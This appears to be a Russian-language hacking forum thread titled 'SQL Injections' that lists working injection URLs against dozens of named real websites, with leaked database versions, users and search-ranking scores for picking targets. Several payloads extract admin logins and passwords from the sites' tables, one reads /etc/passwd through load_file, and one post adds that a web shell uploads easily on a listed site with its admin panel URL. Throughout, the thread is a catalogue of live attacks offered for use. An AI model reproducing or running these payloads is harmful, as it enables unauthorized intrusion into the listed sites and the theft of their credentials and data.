SQL Инъекции

Code:

http://www.hockeypista.it/controllo/vedi_risultati.php?camp=-1+union+select+1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13+--+

Интересный сайт под названием "Хокею писта" ^_^.
Version: 4.1.23-pro-gpl-log
User: [email protected]
Database: hockeypista_it_db1
PR: 3

 

Code:

http://www.russellclub.ru/index.php?id_p=59+union+select+1,2,version(),4,5 --

Музон в тему)

Версия мускула 4.1.25-log

Тиц 10

PR 4

Code:

http://www.dvbellydance.ru/index.php?partid=19&id=-220%20OR%20%28SELECT%20COUNT%28*%29%20FROM%20%28SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%203%29x%20GROUP%20BY%20CONCAT%28MID%28VERSION%28%29,%201,%2063%29,%20FLOOR%28RAND%280%29*2%29%29%29%20--

Версия мускула 4.1.25-log

Тиц 10

PR 3

Code:

http://www.ru7ru.ru/article/index.php?id_article=-86+UNION+SELECT+1,2,3,group_concat%28TABLE_NAME%29,5,6,7,8,9,10,11,12,13,14%20FROM%20INFORMATION_SCHEMA.TABLES--

Версия мускула 5.1.36-log

Тиц и PR 0

Code:

http://mmj.ru/philology.html?&article=955%20%20OR%20%28SELECT%20COUNT%28*%29%20FROM%20%28SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%203%29x%20GROUP%20BY%20CONCAT%28MID%28VERSION%28%29,%201,%2063%29,%20FLOOR%28RAND%280%29*2%29%29%29%20--

Версия мускула 4.1.25-log1

Тиц 110

Pr 3

 

view-source:http://news.74mail.ru/index.php?news_cat_id=-6+union+select+group_concat(schema_name)+from+information_schema.schemata+--+
ТИЦ : 350 PR: 4

http://www.gazeta-unp.ru/archiveold.htm?id=1150+and+1=0+UnIon+selECt+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables+where+table_schema=0x666f72756d+--+
ТИЦ : 1700-немалая пузомерочка )

http://www.jurcity.ru/?module=news&id=174+and+1=0+union+select+1,2,group_concat(table_name),4,5+from+information_Schema.tables+where+table_schema=0x753431323736--+
ТИЦ : 20 PR: 1

http://www.profconsalt.ru/hotline/?id=40+and+1=0+union+select+1,2,3,4,version(),6,7,8,9+--+
4.0.27-log
ТИЦ : 275 PR: 5

http://oz.com.ru/new/st.php?id=8722+and+1=0+union+select+1,2,version(),4,5+--+&sl=4 - Боян!
4.1.21-log
ТИЦ : 40 PR: 3

http://www.beyondcomparison.ru/articles.php?id=44+and+1=0+union+select+1,version(),3,4,5,6,7+--+
ТИЦ: 10
4.1.25-log - опять 4ка = ((

 

http://www.experienceqatar.com/templates/gallery.php?id=-35+UNION+SELECT+1,2,version(),4,5,6,7,8,9--
Database Version: 5.0.70-log
Database name: web02957
User name: [email protected]

 

Code:

http://mlmusic.38th.ru/album.phtml?id=-348+union+select+group_concat(table_name),2,3+from+information_schema.tables--

 

Code:

http://www.pwemag.co.uk/index.php?page=1'+and+1=0+union+select+1,2,3,concat_ws(0x3a,ADMIN_LOGIN,ADMIN_PASSWORD),5,6,7,8,9,10,11,12+from+admin+--+

Version: 5.1.48-COMMUNITY-LOG
User: WEB84-PLANTWORKS@LOCALHOST
Database: WEB84-PLANTWORKS
Admin panel: http://www.pwemag.co.uk/admin/login.php
PR: 3
Шелл льётся очень легко.

 

Code:

http://www.susangail.com/php/shop.php?id=-2+union+select+1,group_concat(table_name)+from+information_schema.tables--

Code:

http://nfljerseyselling.com/shop.php?id=1&sid=-134+union+select+group_concat(table_name)+from+information_schema.tables--

 

Code:

http://www.equivet.ru/parent.php?parent=-47+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema=0x7538303532+--+

version(): 5.0.90-log
PR: 3

 

ЛОЛ

Буагагага!!!
Сайт со смешной статьей - nbwnews.ru/article.php?id_article=226

Бага:

http://nbwnews.ru/article.php?id_article=-1+union+select+1,2,3,4,version(),6--

version DB is MySql 5xxx

Как говорят в народе - "Е**у и плачу=)))"

 

Спать не хочется ))

Code:

http://www.evrocom.ru/news.php?id=-261%27+union%20select%201,2,3,4,cast%28version%28%29+as+char%29,6,7,8,9+--+

Тиц 30

PR 1

Прошло 40 мин .......

Code:

http://www.ecom-info.spb.ru/news/index.php?id=-1359+UNION+SELECT%201,2,3,4,5,VERSION%28%29,7,8,9,10,11,12,13,GROUP_CONCAT%28TABLE_NAME%29,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20%20FROM%20INFORMATION_SCHEMA.TABLES%20--

ТИЦ 240

PR 5

 

Code:

http://studysphere.ru/work.php?id=443+and+ascii%28substring%28%28select+table_name+from+information_schema.tables+limit+17,1%29,1,1%29%29%3E1

Code:

http://www.nordicschool.ru/main.php?id=314+and+1=0+UnIOn+SElect+version(),2--+

 

http://www.brokfin.ru/show.php?page=16&id=78+and+1=0+union+select+group_concat(schema_name),2+from+information_schema.schemata--
ТИЦ : 110 PR: 4

://www.pressmarket.ru/text.html?id=-7+union+select+group_concat(table_name)+from+information_schema.tables+where+table_schema=0x706d5f6462--

http://www.parket-market.com/catalog/?id=29+and+1=0+union+select+version()--

 

Code:

http://www.domotdyha.com/catalog/?id=-107+union+select+1,2,group_concat(table_name),4+from+information_schema.tables--

Code:

http://www.williams-oliver.ru/item.php?id=-2306+union+select+group_concat(0x3a,password,login),2,3,4+from+admins--

 

http://www.phils.uj.edu.pl/inst.php?i=-4+union/***yu*/select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15--&o=1

http://przetargi.adm.uj.edu.pl/tresc.php?Id=-437+union/*gjdgr**/select+1,2,3,version(),5,6,7,8,9,10,11,12,13--


http://gamell.fav.co.il/index.php?dir=app_misc&page=cg_links&op=cat&id=-491'+union+select+1,concat_ws(0x3a,user,password,file_priv,load_file(0x2f6574632f706173737764)),3+from+mysql.user/*

http://www.tierheim-weiden.de/index.php?faq=0&kat=2&kat2=12+union+select+1,2,concat_ws(0x3a,user,password),4,5+from+user--

 

http://www.ithl.org.il/author_info.asp?id=286+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+msysaccessobjects
http://www.israaid.org.il/member_page.asp?id=11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+msysaccessobjects

 

какието игры

http://www.city-interactive.com/index.php?title=gamepage&m=-507+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(login,char(58),pass),20,21,22,23,24,25,26,27,28,29,30,31+from+city_interactive3.Person+--+


здесь пасс в исходнике


http://www.thehouseofgames.net/index.php?t=10&id=-167+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+mysql.user+--+

 

Code:

http://www.waywaycn.com/tp_show.php?id=19397+and+(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,database(),version(),user())),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+

db_waywaycn_com:5.1.30-community-log:waywaycn_com@localhost1
PR4

 

Code:

http://alumni.ece.uprm.edu/news.php?id=1+and+1=0+union+select+concat_ws(0x3a,user,pass),2,3+from+users

edu, PR3

 

http://www.lost-and-found.ru/ind.php?id_typ=-5+union+select+1,2,3,4,5,6,group_concat(apass,char(58),name,char(58),email),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+FROM+job_admin_login--+

тиц 20
хз где эта админка..

 

view-source:http://www.uralkurort.ru/base.php?id_base=-109+union+select+1,concat_ws(0x3a,id_user,login,pass),3,4,5,6,7,8,9,10,11+from+users+limit+0,1--+
ТИЦ : 60

http://www.sib-market.info/ind.php?id_typ=102+and+1=0+union+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables+--+
ТИЦ : 10

http://www.doskaurala.ru/index.php?ci=6&cat=0+and+1=0+union+select+1,2,3,4,5,6--
ТИЦ : 60 PR: 3